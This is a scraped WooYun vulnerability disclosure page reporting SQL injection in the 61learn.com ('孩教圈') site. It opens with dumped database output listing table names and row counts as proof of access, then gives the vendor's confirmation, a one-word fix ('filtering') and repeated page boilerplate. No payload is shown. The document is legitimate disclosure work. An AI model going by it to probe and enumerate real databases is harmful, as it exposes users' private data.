 | pre_common_member_count                  | 843373  |
 | pre_common_member_newprompt              | 744912  |
 | pre_common_member_token                  | 737041  |
 | pre_common_member_verify                 | 736976  |
 | pre_common_member_verify_info            | 736948  |
 | pre_ucenter_pm_indexes                   | 685691  |
 | pre_ucenter_pm_lists                     | 679861  |
 | pre_by_tasklog                           | 661101  |
 | pre_ucenter_newpm                        | 642079  |
 | pre_forum_recent                         | 640153  |
 | `backup_备份表_不要删_pre_common_school_list`        | 282941  |
 | pre_common_school_list                   | 282941  |
 | pre_statistic_activation                 | 202903  |
 | pre_forum_post                           | 166176  |
 | pre_forum_threadpartake                  | 153502  |
 | pre_common_member_position               | 120087  |
 | newusers                                 | 120000  |
 | pre_forum_filter_post                    | 112868  |
 | pre_common_member_children               | 89329   |
 | pre_ucenter_pm_messages_0                | 68757   |
 | pre_ucenter_pm_messages_5                | 68685   |
 | pre_ucenter_pm_messages_6                | 68594   |
 | pre_ucenter_pm_messages_1                | 68583   |
 | pre_ucenter_pm_messages_9                | 68564   |
 | pre_ucenter_pm_messages_8                | 68540   |
 | pre_ucenter_pm_messages_4                | 68523   |
 | pre_ucenter_pm_messages_3                | 68495   |
 | pre_ucenter_pm_messages_7                | 68483   |
 | pre_ucenter_pm_messages_2                | 68467   |
 | pre_forum_attachment                     | 54352   |
 | pre_mobile_sms_code                      | 50012   |
 | pre_forum_indexhot                       | 46624   |
 | pre_common_district                      | 45051   |
 | pre_common_other_infos                   | 44001   |
 | pre_home_favorite                        | 38767   |
 | pre_forum_thread                         | 38044   |
 | ecs_users                                | 35075   |
 | pre_forum_threadmod                      | 25656   |
 | pre_forum_statlog                        | 22828   |
 | pre_common_praise                        | 21519   |
 | pre_common_member_count_archive          | 21248   |
 | pre_common_member_field_forum_archive    | 21248   |
 | pre_common_member_field_home_archive     | 21248   |
 | pre_common_member_status_archive         | 21248   |
 | pre_common_member_profile_archive        | 21247   |
 | pre_common_member_archive                | 21246   |
 | pre_common_onlinetime                    | 19844   |
 | pre_security_evilpost                    | 18848   |
 | pre_common_credit_log                    | 18772   |
 | pre_common_credit_log_field              | 18772   |
 | pre_forum_images_recommend               | 17302   |
 | pre_portal_article_related               | 16792   |
 | pre_forum_huati_isguan                   | 12541   |
 | pre_forum_threadimage                    | 10900   |
 | pre_forum_sofa                           | 6747    |
 | pre_forum_attachment_unused              | 6228    |
 | pre_forum_threadhot                      | 5699    |
 | pre_forum_attachment_6                   | 5640    |
 | pre_forum_attachment_3                   | 5220    |
 | pre_forum_attachment_1                   | 5124    |
 | pre_forum_attachment_2                   | 5107    |
 | pre_forum_attachment_8                   | 5052    |
 | pre_forum_attachment_5                   | 4981    |
 | pre_forum_attachment_4                   | 4941    |
 | pre_forum_attachment_9                   | 4782    |
 | pre_forum_attachment_7                   | 4753    |
 | pre_forum_attachment_0                   | 4684    |
 | pre_forum_modwork                        | 3933    |
 | pre_portal_attachment                    | 3545    |
 | pre_forum_threadcalendar                 | 3137    |
 | pre_common_member_crime                  | 3079    |
 | pre_portal_article_count                 | 3043    |
 | pre_portal_article_content               | 3015    |
 | pre_portal_article_title                 | 2996    |
 | pre_security_eviluser                    | 2959    |
 | pre_forum_huati                          | 2653    |
 | pre_statistic_daylog                     | 2548    |
 | pre_portal_comment                       | 2208    |
 | pre_common_tagitem                       | 2035    |
 | pre_home_pic                             | 1329    |
 | pre_common_credit_rule_log_field         | 1306    |
 | pre_common_block_item                    | 1244    |
 | pre_forum_thread_search_temp             | 1132    |
 | pre_common_tag                           | 1128    |
 | pre_forum_huati_index                    | 1126    |
 | pre_common_member_institution_temp       | 1083    |
 | pre_forum_rsscache                       | 987     |
 | pre_forum_newthread                      | 865     |
 | pre_common_smiley                        | 860     |
 | pre_forum_post_tableid                   | 846     |
 | pre_common_stat                          | 807     |
 | pre_common_member_action_log             | 680     |
 | `backup_国内城市经纬度_不要删`                               | 660     |
 | tb_course                                | 647     |
 | tb_school                                | 583     |
 | pre_common_member_profile_options        | 569     |
 | pre_common_connect_guest                 | 493     |
 | pre_common_setting                       | 447     |
 | pre_common_block                         | 419     |
 | pre_ucenter_feeds                        | 365     |
 | pre_common_seccheck                      | 364     |
 | pre_home_share                           | 359     |
 | pre_common_city                          | 342     |
 | pre_common_school_city                   | 337     |
 | tb_teacher                               | 333     |
 | pre_home_follow_feed_archiver            | 327     |
 | pre_statistic_daylog_login               | 317     |
 | pre_forum_threaddisablepos               | 299     |
 | pre_forum_threadclass                    | 255     |
 | pre_forum_pollvoter                      | 252     |
 | pre_ucenter_notelist                     | 233     |
 | `backup_用户专业领域表_不要删`                               | 231     |
 | pre_connect_memberbindlog                | 187     |
 | pre_common_member_connect                | 180     |
 | pre_common_feedback                      | 172     |
 | pre_home_feed                            | 145     |
 | pre_forum_hotreply_member                | 140     |
 | pre_forum_threadpreview                  | 139     |
 | pre_common_syscache                      | 135     |
 | pre_forum_hotreply_number                | 130     |
 | pre_common_member_institution_coursetype | 122     |
 | pre_forum_polloption                     | 117     |
 | pre_common_block_style                   | 108     |
 | pre_forum_poststick                      | 98      |
 | pre_forum_forumfield                     | 97      |
 | pre_forum_forum                          | 96      |
 | pre_home_friend_request                  | 93      |
 | pre_common_stylevar                      | 90      |
 | pre_common_block_pic                     | 86      |
 | pre_home_friend                          | 74      |
 | pre_common_member_institution_album      | 68      |
 | pre_forum_polloption_image               | 68      |
 | pre_common_admincp_perm                  | 67      |
 | pre_common_nav                           | 62      |
 | pre_common_statuser                      | 58      |
 | pre_common_advertisement_custom          | 54      |
 | pre_common_member_profile_setting        | 51      |
 | pre_home_blacklist                       | 51      |
 | pre_common_member_institution_message    | 50      |
 | pre_mpage_weibo                          | 47      |
 | pre_portal_article_trash                 | 44      |
 | pre_common_advertisement                 | 39      |
 | pre_home_friendlog                       | 39      |
 | pre_common_usergroup_field               | 38      |
 | pre_common_credit_rule                   | 36      |
 | pre_common_optimizer                     | 36      |
 | pre_common_usergroup                     | 36      |
 | pre_common_report                        | 33      |
 | pre_common_school_province               | 31      |
 | pre_forum_moderator                      | 29      |
 | pre_ucenter_settings                     | 27      |
 | pre_common_member_stat_field             | 26      |
 | pre_common_admincp_cmenu                 | 23      |
 | pre_common_word                          | 23      |
 | pre_portal_rsscache                      | 23      |
 | pre_home_album                           | 22      |
 | pre_common_member_institution_photo      | 21      |
 | pre_common_cron                          | 20      |
 | pre_common_cache                         | 17      |
 | pre_dc_mall_address                      | 17      |
 | pre_forum_onlinelist                     | 17      |
 | pre_common_plugin                        | 16      |
 | pre_common_pluginvar                     | 16      |
 | pre_forum_poll                           | 15      |
 | pre_home_click                           | 15      |
 | pre_common_config                        | 13      |
 | pre_home_specialuser                     | 12      |
 | pre_common_diy_data                      | 11      |
 | pre_common_member_institution_report     | 11      |
 | pre_common_searchindex                   | 11      |
 | pre_common_member_institution            | 10      |
 | pre_forum_medal                          | 10      |
 | pre_common_admingroup                    | 9       |
 | pre_common_failedlogin                   | 8       |
 | pre_common_member_institution_cert       | 8       |
 | pre_common_member_institution_type       | 8       |
 | pre_common_member_secwhite               | 8       |
 | pre_home_comment                         | 8       |
 | pre_common_member_institution_age        | 7       |
 | pre_common_member_institution_fans       | 7       |
 | pre_dc_mall_goods                        | 7       |
 | pre_forum_imagetype                      | 7       |
 | pre_common_word_type                     | 6       |
 | pre_forum_typeoption                     | 6       |
 | pre_home_blog                            | 6       |
 | pre_home_blogfield                       | 6       |
 | pre_common_admincp_group                 | 5       |
 | pre_common_member_institution_fans_group | 5       |
 | pre_dc_mall_orders                       | 5       |
 | pre_common_admincp_member                | 4       |
 | pre_common_grouppm                       | 4       |
 | pre_common_member_grouppm                | 4       |
 | pre_connect_postfeedlog                  | 4       |
 | pre_forum_bbcode                         | 4       |
 | pre_home_class                           | 4       |
 | pre_statistic_admin                      | 4       |
 | pre_common_failedip                      | 3       |
 | pre_common_template_block                | 3       |
 | pre_connect_feedlog                      | 3       |
 | pre_forum_access                         | 3       |
 | pre_forum_grouplevel                     | 3       |
 | pre_home_pokearchive                     | 3       |
 | pre_portal_category                      | 3       |
 | pre_common_member_institution_course     | 2       |
 | pre_common_member_institution_video      | 2       |
 | pre_common_style                         | 2       |
 | pre_common_template                      | 2       |
 | pre_forum_forumrecommend                 | 2       |
 | pre_forum_threadtype                     | 2       |
 | pre_forum_warning                        | 2       |
 | pre_home_poke                            | 2       |
 | pre_mobile_setting                       | 2       |
 | pre_statistic_group                      | 2       |
 | pre_ucenter_applications                 | 2       |
 | pre_common_admincp_session               | 1       |
 | pre_common_banned                        | 1       |
 | pre_common_index_module                  | 1       |
 | pre_common_member_institution_bulletin   | 1       |
 | pre_common_member_institution_collection | 1       |
 | pre_common_process                       | 1       |
 | pre_common_secquestion                   | 1       |
 | pre_dc_mall_extend                       | 1       |
 | pre_dc_mall_sort                         | 1       |
 | pre_forum_threadprofile                  | 1       |
 | pre_home_clickuser                       | 1       |
 | pre_ucenter_admins                       | 1       |
 | pre_ucenter_failedlogins                 | 1       |
 +------------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-03 17:40

厂商回复：

已确认问题，正在修复，谢谢

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-01 11:42 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

0

66666

1# 回复此人

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2016-203987

漏洞标题： 孩教圈多处SQL注入涉及百万用户数据垮裤查询+dba权限

相关厂商： 61learn.com

漏洞作者： 黑色键盘丶

提交时间： 2016-05-03 17:25

公开时间： 2016-06-17 17:50

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(9) 关注此漏洞

漏洞标题：孩教圈多处SQL注入涉及百万用户数据垮裤查询+dba权限

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：厂商已经确认

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分